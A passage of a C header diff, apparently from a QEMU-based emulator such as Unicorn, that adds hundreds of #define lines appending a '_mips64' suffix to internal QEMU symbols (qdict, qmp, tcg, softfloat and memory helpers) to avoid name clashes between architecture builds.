qapi_free_int16List_mips64 +#define qapi_free_int32List qapi_free_int32List_mips64 +#define qapi_free_int64List qapi_free_int64List_mips64 +#define qapi_free_int8List qapi_free_int8List_mips64 +#define qapi_free_intList qapi_free_intList_mips64 +#define qapi_free_numberList qapi_free_numberList_mips64 +#define qapi_free_strList qapi_free_strList_mips64 +#define qapi_free_uint16List qapi_free_uint16List_mips64 +#define qapi_free_uint32List qapi_free_uint32List_mips64 +#define qapi_free_uint64List qapi_free_uint64List_mips64 +#define qapi_free_uint8List qapi_free_uint8List_mips64 +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_mips64 +#define qapi_free_X86CPUFeatureWordInfoList 
qapi_free_X86CPUFeatureWordInfoList_mips64 +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_mips64 +#define qbool_destroy_obj qbool_destroy_obj_mips64 +#define qbool_from_int qbool_from_int_mips64 +#define qbool_get_int qbool_get_int_mips64 +#define qbool_type qbool_type_mips64 +#define qbus_create qbus_create_mips64 +#define qbus_create_inplace qbus_create_inplace_mips64 +#define qbus_finalize qbus_finalize_mips64 +#define qbus_initfn qbus_initfn_mips64 +#define qbus_realize qbus_realize_mips64 +#define qdev_create qdev_create_mips64 +#define qdev_get_type qdev_get_type_mips64 +#define qdev_register_types qdev_register_types_mips64 +#define qdev_set_parent_bus qdev_set_parent_bus_mips64 +#define qdev_try_create qdev_try_create_mips64 +#define qdict_add_key qdict_add_key_mips64 +#define qdict_array_split qdict_array_split_mips64 +#define qdict_clone_shallow qdict_clone_shallow_mips64 +#define qdict_del qdict_del_mips64 +#define qdict_destroy_obj qdict_destroy_obj_mips64 +#define qdict_entry_key qdict_entry_key_mips64 +#define qdict_entry_value qdict_entry_value_mips64 +#define qdict_extract_subqdict qdict_extract_subqdict_mips64 +#define qdict_find qdict_find_mips64 +#define qdict_first qdict_first_mips64 +#define qdict_flatten qdict_flatten_mips64 +#define qdict_flatten_qdict qdict_flatten_qdict_mips64 +#define qdict_flatten_qlist qdict_flatten_qlist_mips64 +#define qdict_get qdict_get_mips64 +#define qdict_get_bool qdict_get_bool_mips64 +#define qdict_get_double qdict_get_double_mips64 +#define qdict_get_int qdict_get_int_mips64 +#define qdict_get_obj qdict_get_obj_mips64 +#define qdict_get_qdict qdict_get_qdict_mips64 +#define qdict_get_qlist qdict_get_qlist_mips64 +#define qdict_get_str qdict_get_str_mips64 +#define qdict_get_try_bool qdict_get_try_bool_mips64 +#define qdict_get_try_int qdict_get_try_int_mips64 +#define qdict_get_try_str qdict_get_try_str_mips64 +#define qdict_haskey qdict_haskey_mips64 +#define qdict_has_prefixed_entries 
qdict_has_prefixed_entries_mips64 +#define qdict_iter qdict_iter_mips64 +#define qdict_join qdict_join_mips64 +#define qdict_new qdict_new_mips64 +#define qdict_next qdict_next_mips64 +#define qdict_next_entry qdict_next_entry_mips64 +#define qdict_put_obj qdict_put_obj_mips64 +#define qdict_size qdict_size_mips64 +#define qdict_type qdict_type_mips64 +#define qemu_clock_get_us qemu_clock_get_us_mips64 +#define qemu_clock_ptr qemu_clock_ptr_mips64 +#define qemu_clocks qemu_clocks_mips64 +#define qemu_get_cpu qemu_get_cpu_mips64 +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_mips64 +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_mips64 +#define qemu_get_ram_block qemu_get_ram_block_mips64 +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_mips64 +#define qemu_get_ram_fd qemu_get_ram_fd_mips64 +#define qemu_get_ram_ptr qemu_get_ram_ptr_mips64 +#define qemu_host_page_mask qemu_host_page_mask_mips64 +#define qemu_host_page_size qemu_host_page_size_mips64 +#define qemu_init_vcpu qemu_init_vcpu_mips64 +#define qemu_ld_helpers qemu_ld_helpers_mips64 +#define qemu_log_close qemu_log_close_mips64 +#define qemu_log_enabled qemu_log_enabled_mips64 +#define qemu_log_flush qemu_log_flush_mips64 +#define qemu_loglevel_mask qemu_loglevel_mask_mips64 +#define qemu_log_vprintf qemu_log_vprintf_mips64 +#define qemu_oom_check qemu_oom_check_mips64 +#define qemu_parse_fd qemu_parse_fd_mips64 +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_mips64 +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_mips64 +#define qemu_ram_alloc qemu_ram_alloc_mips64 +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_mips64 +#define qemu_ram_foreach_block qemu_ram_foreach_block_mips64 +#define qemu_ram_free qemu_ram_free_mips64 +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_mips64 +#define qemu_ram_ptr_length qemu_ram_ptr_length_mips64 +#define qemu_ram_remap qemu_ram_remap_mips64 +#define 
qemu_ram_setup_dump qemu_ram_setup_dump_mips64 +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_mips64 +#define qemu_real_host_page_size qemu_real_host_page_size_mips64 +#define qemu_st_helpers qemu_st_helpers_mips64 +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_mips64 +#define qemu_try_memalign qemu_try_memalign_mips64 +#define qentry_destroy qentry_destroy_mips64 +#define qerror_human qerror_human_mips64 +#define qerror_report qerror_report_mips64 +#define qerror_report_err qerror_report_err_mips64 +#define qfloat_destroy_obj qfloat_destroy_obj_mips64 +#define qfloat_from_double qfloat_from_double_mips64 +#define qfloat_get_double qfloat_get_double_mips64 +#define qfloat_type qfloat_type_mips64 +#define qint_destroy_obj qint_destroy_obj_mips64 +#define qint_from_int qint_from_int_mips64 +#define qint_get_int qint_get_int_mips64 +#define qint_type qint_type_mips64 +#define qlist_append_obj qlist_append_obj_mips64 +#define qlist_copy qlist_copy_mips64 +#define qlist_copy_elem qlist_copy_elem_mips64 +#define qlist_destroy_obj qlist_destroy_obj_mips64 +#define qlist_empty qlist_empty_mips64 +#define qlist_entry_obj qlist_entry_obj_mips64 +#define qlist_first qlist_first_mips64 +#define qlist_iter qlist_iter_mips64 +#define qlist_new qlist_new_mips64 +#define qlist_next qlist_next_mips64 +#define qlist_peek qlist_peek_mips64 +#define qlist_pop qlist_pop_mips64 +#define qlist_size qlist_size_mips64 +#define qlist_size_iter qlist_size_iter_mips64 +#define qlist_type qlist_type_mips64 +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_mips64 +#define qmp_input_end_list qmp_input_end_list_mips64 +#define qmp_input_end_struct qmp_input_end_struct_mips64 +#define qmp_input_get_next_type qmp_input_get_next_type_mips64 +#define qmp_input_get_object qmp_input_get_object_mips64 +#define qmp_input_get_visitor qmp_input_get_visitor_mips64 +#define qmp_input_next_list qmp_input_next_list_mips64 +#define qmp_input_optional qmp_input_optional_mips64 +#define 
qmp_input_pop qmp_input_pop_mips64 +#define qmp_input_push qmp_input_push_mips64 +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_mips64 +#define qmp_input_start_list qmp_input_start_list_mips64 +#define qmp_input_start_struct qmp_input_start_struct_mips64 +#define qmp_input_type_bool qmp_input_type_bool_mips64 +#define qmp_input_type_int qmp_input_type_int_mips64 +#define qmp_input_type_number qmp_input_type_number_mips64 +#define qmp_input_type_str qmp_input_type_str_mips64 +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_mips64 +#define qmp_input_visitor_new qmp_input_visitor_new_mips64 +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_mips64 +#define qmp_output_add_obj qmp_output_add_obj_mips64 +#define qmp_output_end_list qmp_output_end_list_mips64 +#define qmp_output_end_struct qmp_output_end_struct_mips64 +#define qmp_output_first qmp_output_first_mips64 +#define qmp_output_get_qobject qmp_output_get_qobject_mips64 +#define qmp_output_get_visitor qmp_output_get_visitor_mips64 +#define qmp_output_last qmp_output_last_mips64 +#define qmp_output_next_list qmp_output_next_list_mips64 +#define qmp_output_pop qmp_output_pop_mips64 +#define qmp_output_push_obj qmp_output_push_obj_mips64 +#define qmp_output_start_list qmp_output_start_list_mips64 +#define qmp_output_start_struct qmp_output_start_struct_mips64 +#define qmp_output_type_bool qmp_output_type_bool_mips64 +#define qmp_output_type_int qmp_output_type_int_mips64 +#define qmp_output_type_number qmp_output_type_number_mips64 +#define qmp_output_type_str qmp_output_type_str_mips64 +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_mips64 +#define qmp_output_visitor_new qmp_output_visitor_new_mips64 +#define qobject_decref qobject_decref_mips64 +#define qobject_to_qbool qobject_to_qbool_mips64 +#define qobject_to_qdict qobject_to_qdict_mips64 +#define qobject_to_qfloat qobject_to_qfloat_mips64 +#define qobject_to_qint qobject_to_qint_mips64 
+#define qobject_to_qlist qobject_to_qlist_mips64 +#define qobject_to_qstring qobject_to_qstring_mips64 +#define qobject_type qobject_type_mips64 +#define qstring_append qstring_append_mips64 +#define qstring_append_chr qstring_append_chr_mips64 +#define qstring_append_int qstring_append_int_mips64 +#define qstring_destroy_obj qstring_destroy_obj_mips64 +#define qstring_from_escaped_str qstring_from_escaped_str_mips64 +#define qstring_from_str qstring_from_str_mips64 +#define qstring_from_substr qstring_from_substr_mips64 +#define qstring_get_length qstring_get_length_mips64 +#define qstring_get_str qstring_get_str_mips64 +#define qstring_new qstring_new_mips64 +#define qstring_type qstring_type_mips64 +#define ram_block_add ram_block_add_mips64 +#define ram_size ram_size_mips64 +#define range_compare range_compare_mips64 +#define range_covers_byte range_covers_byte_mips64 +#define range_get_last range_get_last_mips64 +#define range_merge range_merge_mips64 +#define ranges_can_merge ranges_can_merge_mips64 +#define raw_read raw_read_mips64 +#define raw_write raw_write_mips64 +#define rcon rcon_mips64 +#define read_raw_cp_reg read_raw_cp_reg_mips64 +#define recip_estimate recip_estimate_mips64 +#define recip_sqrt_estimate recip_sqrt_estimate_mips64 +#define register_cp_regs_for_features register_cp_regs_for_features_mips64 +#define register_multipage register_multipage_mips64 +#define register_subpage register_subpage_mips64 +#define register_tm_clones register_tm_clones_mips64 +#define register_types_object register_types_object_mips64 +#define regnames regnames_mips64 +#define render_memory_region render_memory_region_mips64 +#define reset_all_temps reset_all_temps_mips64 +#define reset_temp reset_temp_mips64 +#define rol32 rol32_mips64 +#define rol64 rol64_mips64 +#define ror32 ror32_mips64 +#define ror64 ror64_mips64 +#define roundAndPackFloat128 roundAndPackFloat128_mips64 +#define roundAndPackFloat16 roundAndPackFloat16_mips64 +#define roundAndPackFloat32 
roundAndPackFloat32_mips64 +#define roundAndPackFloat64 roundAndPackFloat64_mips64 +#define roundAndPackFloatx80 roundAndPackFloatx80_mips64 +#define roundAndPackInt32 roundAndPackInt32_mips64 +#define roundAndPackInt64 roundAndPackInt64_mips64 +#define roundAndPackUint64 roundAndPackUint64_mips64 +#define round_to_inf round_to_inf_mips64 +#define run_on_cpu run_on_cpu_mips64 +#define s0 s0_mips64 +#define S0 S0_mips64 +#define s1 s1_mips64 +#define S1 S1_mips64 +#define sa1100_initfn sa1100_initfn_mips64 +#define sa1110_initfn sa1110_initfn_mips64 +#define save_globals save_globals_mips64 +#define scr_write scr_write_mips64 +#define sctlr_write sctlr_write_mips64 +#define set_bit set_bit_mips64 +#define set_bits set_bits_mips64 +#define set_default_nan_mode set_default_nan_mode_mips64 +#define set_feature set_feature_mips64 +#define set_float_detect_tininess set_float_detect_tininess_mips64 +#define set_float_exception_flags set_float_exception_flags_mips64 +#define set_float_rounding_mode set_float_rounding_mode_mips64 +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_mips64 +#define set_flush_to_zero set_flush_to_zero_mips64 +#define set_swi_errno set_swi_errno_mips64 +#define sextract32 sextract32_mips64 +#define sextract64 sextract64_mips64 +#define shift128ExtraRightJamming shift128ExtraRightJamming_mips64 +#define shift128Right shift128Right_mips64 +#define shift128RightJamming shift128RightJamming_mips64 +#define shift32RightJamming shift32RightJamming_mips64 +#define shift64ExtraRightJamming shift64ExtraRightJamming_mips64 +#define shift64RightJamming shift64RightJamming_mips64 +#define shifter_out_im shifter_out_im_mips64 +#define shortShift128Left shortShift128Left_mips64 +#define shortShift192Left shortShift192Left_mips64 +#define simple_mpu_ap_bits simple_mpu_ap_bits_mips64 +#define size_code_gen_buffer size_code_gen_buffer_mips64 +#define softmmu_lock_user softmmu_lock_user_mips64 +#define softmmu_lock_user_string 
softmmu_lock_user_string_mips64 +#define softmmu_tget32 softmmu_tget32_mips64 +#define softmmu_tget8 softmmu_tget8_mips64 +#define softmmu_tput32 softmmu_tput32_mips64 +#define softmmu_unlock_user softmmu_unlock_user_mips64 +#define sort_constraints sort_constraints_mips64 +#define sp_el0_access sp_el0_access_mips64 +#define spsel_read spsel_read_mips64 +#define spsel_write spsel_write_mips64 +#define start_list start_list_mips64 +#define stb_p stb_p_mips64 +#define stb_phys stb_phys_mips64 +#define stl_be_p stl_be_p_mips64 +#define stl_be_phys stl_be_phys_mips64 +#define stl_he_p stl_he_p_mips64 +#define stl_le_p stl_le_p_mips64 +#define stl_le_phys stl_le_phys_mips64 +#define stl_phys stl_phys_mips64 +#define stl_phys_internal stl_phys_internal_mips64 +#define stl_phys_notdirty stl_phys_notdirty_mips64 +#define store_cpu_offset store_cpu_offset_mips64 +#define store_reg store_reg_mips64 +#define store_reg_bx store_reg_bx_mips64 +#define store_reg_from_load store_reg_from_load_mips64 +#define stq_be_p stq_be_p_mips64 +#define stq_be_phys stq_be_phys_mips64 +#define stq_he_p stq_he_p_mips64 +#define stq_le_p stq_le_p_mips64 +#define stq_le_phys stq_le_phys_mips64 +#define stq_phys stq_phys_mips64 +#define string_input_get_visitor string_input_get_visitor_mips64 +#define string_input_visitor_cleanup string_input_visitor_cleanup_mips64 +#define string_input_visitor_new string_input_visitor_new_mips64 +#define strongarm_cp_reginfo strongarm_cp_reginfo_mips64 +#define strstart strstart_mips64 +#define strtosz strtosz_mips64 +#define strtosz_suffix strtosz_suffix_mips64 +#define stw_be_p stw_be_p_mips64 +#define stw_be_phys stw_be_phys_mips64 +#define stw_he_p stw_he_p_mips64 +#define stw_le_p stw_le_p_mips64 +#define stw_le_phys stw_le_phys_mips64 +#define stw_phys stw_phys_mips64 +#define stw_phys_internal stw_phys_internal_mips64 +#define sub128 sub128_mips64 +#define sub16_sat sub16_sat_mips64 +#define sub16_usat sub16_usat_mips64 +#define sub192 sub192_mips64 
+#define sub8_sat sub8_sat_mips64 +#define sub8_usat sub8_usat_mips64 +#define subFloat128Sigs subFloat128Sigs_mips64 +#define subFloat32Sigs subFloat32Sigs_mips64 +#define subFloat64Sigs subFloat64Sigs_mips64 +#define subFloatx80Sigs subFloatx80Sigs_mips64 +#define subpage_accepts subpage_accepts_mips64 +#define subpage_init subpage_init_mips64 +#define subpage_ops subpage_ops_mips64 +#define subpage_read subpage_read_mips64 +#define subpage_register subpage_register_mips64 +#define subpage_write subpage_write_mips64 +#define suffix_mul suffix_mul_mips64 +#define swap_commutative swap_commutative_mips64 +#define swap_commutative2 swap_commutative2_mips64 +#define switch_mode switch_mode_mips64 +#define switch_v7m_sp switch_v7m_sp_mips64 +#define syn_aa32_bkpt syn_aa32_bkpt_mips64 +#define syn_aa32_hvc syn_aa32_hvc_mips64 +#define syn_aa32_smc syn_aa32_smc_mips64 +#define syn_aa32_svc syn_aa32_svc_mips64 +#define syn_breakpoint syn_breakpoint_mips64 +#define sync_globals sync_globals_mips64 +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_mips64 +#define syn_cp14_rt_trap syn_cp14_rt_trap_mips64 +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_mips64 +#define syn_cp15_rt_trap syn_cp15_rt_trap_mips64 +#define syn_data_abort syn_data_abort_mips64 +#define syn_fp_access_trap syn_fp_access_trap_mips64 +#define syn_insn_abort syn_insn_abort_mips64 +#define syn_swstep syn_swstep_mips64 +#define syn_uncategorized syn_uncategorized_mips64 +#define syn_watchpoint syn_watchpoint_mips64 +#define syscall_err syscall_err_mips64 +#define system_bus_class_init system_bus_class_init_mips64 +#define system_bus_info system_bus_info_mips64 +#define t2ee_cp_reginfo t2ee_cp_reginfo_mips64 +#define table_logic_cc table_logic_cc_mips64 +#define target_parse_constraint target_parse_constraint_mips64 +#define target_words_bigendian target_words_bigendian_mips64 +#define tb_add_jump tb_add_jump_mips64 +#define tb_alloc tb_alloc_mips64 +#define tb_alloc_page tb_alloc_page_mips64 +#define 
tb_check_watchpoint tb_check_watchpoint_mips64 +#define tb_find_fast tb_find_fast_mips64 +#define tb_find_pc tb_find_pc_mips64 +#define tb_find_slow tb_find_slow_mips64 +#define tb_flush tb_flush_mips64 +#define tb_flush_jmp_cache tb_flush_jmp_cache_mips64 +#define tb_free tb_free_mips64 +#define tb_gen_code tb_gen_code_mips64 +#define tb_hash_remove tb_hash_remove_mips64 +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_mips64 +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_mips64 +#define tb_invalidate_phys_range tb_invalidate_phys_range_mips64 +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_mips64 +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_mips64 +#define tb_jmp_remove tb_jmp_remove_mips64 +#define tb_link_page tb_link_page_mips64 +#define tb_page_remove tb_page_remove_mips64 +#define tb_phys_hash_func tb_phys_hash_func_mips64 +#define tb_phys_invalidate tb_phys_invalidate_mips64 +#define tb_reset_jump tb_reset_jump_mips64 +#define tb_set_jmp_target tb_set_jmp_target_mips64 +#define tcg_accel_class_init tcg_accel_class_init_mips64 +#define tcg_accel_type tcg_accel_type_mips64 +#define tcg_add_param_i32 tcg_add_param_i32_mips64 +#define tcg_add_param_i64 tcg_add_param_i64_mips64 +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_mips64 +#define tcg_allowed tcg_allowed_mips64 +#define tcg_canonicalize_memop tcg_canonicalize_memop_mips64 +#define tcg_commit tcg_commit_mips64 +#define tcg_cond_to_jcc tcg_cond_to_jcc_mips64 +#define tcg_constant_folding tcg_constant_folding_mips64 +#define tcg_const_i32 tcg_const_i32_mips64 +#define tcg_const_i64 tcg_const_i64_mips64 +#define tcg_const_local_i32 tcg_const_local_i32_mips64 +#define tcg_const_local_i64 tcg_const_local_i64_mips64 +#define tcg_context_init tcg_context_init_mips64 +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_mips64 +#define tcg_cpu_exec tcg_cpu_exec_mips64 +#define tcg_current_code_size tcg_current_code_size_mips64 +#define 
tcg_dump_info tcg_dump_info_mips64 +#define tcg_dump_ops tcg_dump_ops_mips64 +#define tcg_exec_all tcg_exec_all_mips64 +#define tcg_find_helper tcg_find_helper_mips64 +#define tcg_func_start tcg_func_start_mips64 +#define tcg_gen_abs_i32 tcg_gen_abs_i32_mips64 +#define tcg_gen_add2_i32 tcg_gen_add2_i32_mips64 +#define tcg_gen_add_i32 tcg_gen_add_i32_mips64 +#define tcg_gen_add_i64 tcg_gen_add_i64_mips64 +#define tcg_gen_addi_i32 tcg_gen_addi_i32_mips64 +#define tcg_gen_addi_i64 tcg_gen_addi_i64_mips64 +#define tcg_gen_andc_i32 tcg_gen_andc_i32_mips64 +#define tcg_gen_and_i32 tcg_gen_and_i32_mips64 +#define tcg_gen_and_i64 tcg_gen_and_i64_mips64 +#define tcg_gen_andi_i32 tcg_gen_andi_i32_mips64 +#define tcg_gen_andi_i64 tcg_gen_andi_i64_mips64 +#define tcg_gen_br tcg_gen_br_mips64 +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_mips64 +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_mips64 +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_mips64 +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_mips64 +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_mips64 +#define tcg_gen_callN tcg_gen_callN_mips64 +#define tcg_gen_code tcg_gen_code_mips64 +#define tcg_gen_code_common tcg_gen_code_common_mips64 +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_mips64 +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_mips64 +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_mips64 +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_mips64 +#define tcg_gen_exit_tb tcg_gen_exit_tb_mips64 +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_mips64 +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_mips64 +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_mips64 +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_mips64 +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_mips64 +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_mips64 +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_mips64 +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_mips64 +#define tcg_gen_goto_tb tcg_gen_goto_tb_mips64 +#define 
tcg_gen_ld_i32 tcg_gen_ld_i32_mips64 +#define tcg_gen_ld_i64 tcg_gen_ld_i64_mips64 +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_mips64 +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_mips64 +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_mips64 +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_mips64 +#define tcg_gen_mov_i32 tcg_gen_mov_i32_mips64 +#define tcg_gen_mov_i64 tcg_gen_mov_i64_mips64 +#define tcg_gen_movi_i32 tcg_gen_movi_i32_mips64 +#define tcg_gen_movi_i64 tcg_gen_movi_i64_mips64 +#define tcg_gen_mul_i32 tcg_gen_mul_i32_mips64 +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_mips64 +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_mips64 +#define tcg_gen_neg_i32 tcg_gen_neg_i32_mips64 +#define tcg_gen_neg_i64 tcg_gen_neg_i64_mips64 +#define tcg_gen_not_i32 tcg_gen_not_i32_mips64 +#define tcg_gen_op0 tcg_gen_op0_mips64 +#define tcg_gen_op1i tcg_gen_op1i_mips64 +#define tcg_gen_op2_i32 tcg_gen_op2_i32_mips64 +#define tcg_gen_op2_i64 tcg_gen_op2_i64_mips64 +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_mips64 +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_mips64 +#define tcg_gen_op3_i32 tcg_gen_op3_i32_mips64 +#define tcg_gen_op3_i64 tcg_gen_op3_i64_mips64 +#define tcg_gen_op4_i32 tcg_gen_op4_i32_mips64 +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_mips64 +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_mips64 +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_mips64 +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_mips64 +#define tcg_gen_op6_i32 tcg_gen_op6_i32_mips64 +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_mips64 +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_mips64 +#define tcg_gen_orc_i32 tcg_gen_orc_i32_mips64 +#define tcg_gen_or_i32 tcg_gen_or_i32_mips64 +#define tcg_gen_or_i64 tcg_gen_or_i64_mips64 +#define tcg_gen_ori_i32 tcg_gen_ori_i32_mips64 +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_mips64 +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_mips64 +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_mips64 +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_mips64 +#define 
tcg_gen_rotl_i32 tcg_gen_rotl_i32_mips64 +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_mips64 +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_mips64 +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_mips64 +#define tcg_gen_sar_i32 tcg_gen_sar_i32_mips64 +#define tcg_gen_sari_i32 tcg_gen_sari_i32_mips64 +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_mips64 +#define tcg_gen_shl_i32 tcg_gen_shl_i32_mips64 +#define tcg_gen_shl_i64 tcg_gen_shl_i64_mips64 +#define tcg_gen_shli_i32 tcg_gen_shli_i32_mips64 +#define tcg_gen_shli_i64 tcg_gen_shli_i64_mips64 +#define tcg_gen_shr_i32 tcg_gen_shr_i32_mips64 +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_mips64 +#define tcg_gen_shr_i64 tcg_gen_shr_i64_mips64 +#define tcg_gen_shri_i32 tcg_gen_shri_i32_mips64 +#define tcg_gen_shri_i64 tcg_gen_shri_i64_mips64 +#define tcg_gen_st_i32 tcg_gen_st_i32_mips64 +#define tcg_gen_st_i64 tcg_gen_st_i64_mips64 +#define tcg_gen_sub_i32 tcg_gen_sub_i32_mips64 +#define tcg_gen_sub_i64 tcg_gen_sub_i64_mips64 +#define tcg_gen_subi_i32 tcg_gen_subi_i32_mips64 +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_mips64 +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_mips64 +#define tcg_gen_xor_i32 tcg_gen_xor_i32_mips64 +#define tcg_gen_xor_i64 tcg_gen_xor_i64_mips64 +#define tcg_gen_xori_i32 tcg_gen_xori_i32_mips64 +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_mips64 +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_mips64 +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_mips64 +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_mips64 +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_mips64 +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_mips64 +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_mips64 +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_mips64 +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_mips64 +#define tcg_handle_interrupt tcg_handle_interrupt_mips64 +#define tcg_init tcg_init_mips64 +#define tcg_invert_cond 
tcg_invert_cond_mips64 +#define tcg_la_bb_end tcg_la_bb_end_mips64 +#define tcg_la_br_end tcg_la_br_end_mips64 +#define tcg_la_func_end tcg_la_func_end_mips64 +#define tcg_liveness_analysis tcg_liveness_analysis_mips64 +#define tcg_malloc tcg_malloc_mips64 +#define tcg_malloc_internal tcg_malloc_internal_mips64 +#define tcg_op_defs_org tcg_op_defs_org_mips64 +#define tcg_opt_gen_mov tcg_opt_gen_mov_mips64 +#define tcg_opt_gen_movi tcg_opt_gen_movi_mips64 +#define tcg_optimize tcg_optimize_mips64 +#define tcg_out16 tcg_out16_mips64 +#define tcg_out32 tcg_out32_mips64 +#define tcg_out64 tcg_out64_mips64 +#define tcg_out8 tcg_out8_mips64 +#define tcg_out_addi tcg_out_addi_mips64 +#define tcg_out_branch tcg_out_branch_mips64 +#define tcg_out_brcond32 tcg_out_brcond32_mips64 +#define tcg_out_brcond64 tcg_out_brcond64_mips64 +#define tcg_out_bswap32 tcg_out_bswap32_mips64 +#define tcg_out_bswap64 tcg_out_bswap64_mips64 +#define tcg_out_call tcg_out_call_mips64 +#define tcg_out_cmp tcg_out_cmp_mips64 +#define tcg_out_ext16s tcg_out_ext16s_mips64 +#define tcg_out_ext16u tcg_out_ext16u_mips64 +#define tcg_out_ext32s tcg_out_ext32s_mips64 +#define tcg_out_ext32u tcg_out_ext32u_mips64 +#define tcg_out_ext8s tcg_out_ext8s_mips64 +#define tcg_out_ext8u tcg_out_ext8u_mips64 +#define tcg_out_jmp tcg_out_jmp_mips64 +#define tcg_out_jxx tcg_out_jxx_mips64 +#define tcg_out_label tcg_out_label_mips64 +#define tcg_out_ld tcg_out_ld_mips64 +#define tcg_out_modrm tcg_out_modrm_mips64 +#define tcg_out_modrm_offset tcg_out_modrm_offset_mips64 +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_mips64 +#define tcg_out_mov tcg_out_mov_mips64 +#define tcg_out_movcond32 tcg_out_movcond32_mips64 +#define tcg_out_movcond64 tcg_out_movcond64_mips64 +#define tcg_out_movi tcg_out_movi_mips64 +#define tcg_out_op tcg_out_op_mips64 +#define tcg_out_pop tcg_out_pop_mips64 +#define tcg_out_push tcg_out_push_mips64 +#define tcg_out_qemu_ld tcg_out_qemu_ld_mips64 +#define tcg_out_qemu_ld_direct 
tcg_out_qemu_ld_direct_mips64 +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_mips64 +#define tcg_out_qemu_st tcg_out_qemu_st_mips64 +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_mips64 +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_mips64 +#define tcg_out_reloc tcg_out_reloc_mips64 +#define tcg_out_rolw_8 tcg_out_rolw_8_mips64 +#define tcg_out_setcond32 tcg_out_setcond32_mips64 +#define tcg_out_setcond64 tcg_out_setcond64_mips64 +#define tcg_out_shifti tcg_out_shifti_mips64 +#define tcg_out_st tcg_out_st_mips64 +#define tcg_out_tb_finalize tcg_out_tb_finalize_mips64 +#define tcg_out_tb_init tcg_out_tb_init_mips64 +#define tcg_out_tlb_load tcg_out_tlb_load_mips64 +#define tcg_out_vex_modrm tcg_out_vex_modrm_mips64 +#define tcg_patch32 tcg_patch32_mips64 +#define tcg_patch8 tcg_patch8_mips64 +#define tcg_pcrel_diff tcg_pcrel_diff_mips64 +#define tcg_pool_reset tcg_pool_reset_mips64 +#define tcg_prologue_init tcg_prologue_init_mips64 +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_mips64 +#define 